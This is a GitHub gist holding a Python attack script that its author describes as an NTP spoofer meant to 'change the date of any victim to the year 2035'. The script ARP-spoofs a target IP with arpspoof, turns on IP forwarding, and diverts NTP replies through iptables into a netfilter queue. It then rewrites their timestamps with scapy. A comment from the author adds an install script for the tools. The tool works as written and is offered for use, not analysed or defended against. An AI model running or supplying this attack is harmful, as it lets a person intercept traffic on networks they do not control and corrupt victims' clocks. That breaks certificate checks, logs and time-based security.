Skip to content

Instantly share code, notes, and snippets.

@Dbof Dbof/ntpspoof.py
Last active Mar 8, 2019

Embed
What would you like to do?
NTP spoofer to change the date of any victim to the year 2035
import os
import sys
import time
from subprocess import Popen, DEVNULL
import datetime
from scapy.all import IP, UDP, NTP
from netfilterqueue import NetfilterQueue
def get_switch_ip():
os.system('route -n | grep ^0.0.0.0 | cut -d ' ' -f 10')
SYSTEM_EPOCH = datetime.date(*time.gmtime(0)[0:3])
NTP_EPOCH = datetime.date(1900, 1, 1)
NTP_DELTA = (SYSTEM_EPOCH - NTP_EPOCH).days * 24 * 3600
def ntp_to_system_time(date):
"""convert a NTP time to system time"""
return date - NTP_DELTA
def system_to_ntp_time(date):
"""convert a system time to a NTP time"""
return date + NTP_DELTA
# SET TIME TO BE THE YEAR 2035
def upgrade_year(dtime):
new_time = datetime.datetime(2035, dtime.month, dtime.day, dtime.hour,
dtime.minute, dtime.second, dtime.microsecond)
return new_time.timestamp()
def modify_package(pkg):
if pkg.haslayer(NTP):
ntp = pkg.getlayer(NTP)
else:
ntp = NTP(pkg.load)
if ntp.mode == 4: # server
# convert to utc time
new_ref = ntp_to_system_time(ntp.ref)
new_recv = ntp_to_system_time(ntp.recv)
new_sent = ntp_to_system_time(ntp.sent)
# upgrade the year
new_ref = upgrade_year(datetime.datetime.fromtimestamp(new_ref))
new_recv = upgrade_year(datetime.datetime.fromtimestamp(new_recv))
new_sent = upgrade_year(datetime.datetime.fromtimestamp(new_sent))
# convert to utc timestamp
ntp.recv = system_to_ntp_time(new_recv)
ntp.sent = system_to_ntp_time(new_sent)
ntp.ref = system_to_ntp_time(new_ref)
pkg.load = bytes(ntp)
return pkg
def manipulate(netpackage):
pkg = IP(netpackage.get_payload())
udp = pkg.getlayer(UDP)
print('Received package for:', pkg.dst, end=' -> ')
# delete checksum to recalculate
del pkg.chksum
del udp.chksum
pkg_m = modify_package(pkg)
print('Modified!')
# set the packet content to our modified version
netpackage.set_payload(bytes(pkg_m))
netpackage.accept() # accept the packet
if __name__ == '__main__':
if os.geteuid() != 0:
print('You have to run the script as root')
exit(1)
if len(sys.argv) < 2:
print('Usage: ntpspoof <target_ip> <net interface (Optional)>')
print('Example: ntpspoof 192.168.2.99 eth0')
exit(1)
if len(sys.argv) < 3:
print('No network interface specified. Using \'eth0\'')
iface = 'eth0'
else:
iface = sys.argv[2]
# calculate IP addresses
ip_addr = sys.argv[1]
router_ip = ip_addr[0:ip_addr.rfind('.')] + '.1'
print('Running ARP spoofing for target:', ip_addr,
'using the router:', router_ip)
p = Popen(['arpspoof', '-i', iface, '-t', router_ip, ip_addr],
stderr=DEVNULL, stdout=DEVNULL)
# run iptables
with open('/proc/sys/net/ipv4/ip_forward', 'w') as f:
print('1\n', file=f)
os.system('iptables -t raw -A PREROUTING -p udp -d '
+ router_ip + '/24 --sport 123 -j NFQUEUE --queue-num 99')
nfqueue = NetfilterQueue()
# 99 is the iptabels rule queue number, modify is the callback function
nfqueue.bind(99, manipulate)
try:
print("[*] waiting for NTP packages")
nfqueue.run()
except KeyboardInterrupt:
pass
finally:
nfqueue.unbind()
p.terminate()
os.system('iptables -F -vt raw')
@Dbof

This comment has been minimized.

Copy link
Owner Author

Dbof commented Nov 11, 2016

To install all requirements, use the following script:

# install.sh

# ensure running as root
if [ "$(id -u)" != "0" ]; then
  exec sudo "$0" "$@"
fi
apt-get install dsniff libnetfilter-queue-dev python3 python3-pip
pip3 install netfilterqueue scapy-python3
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.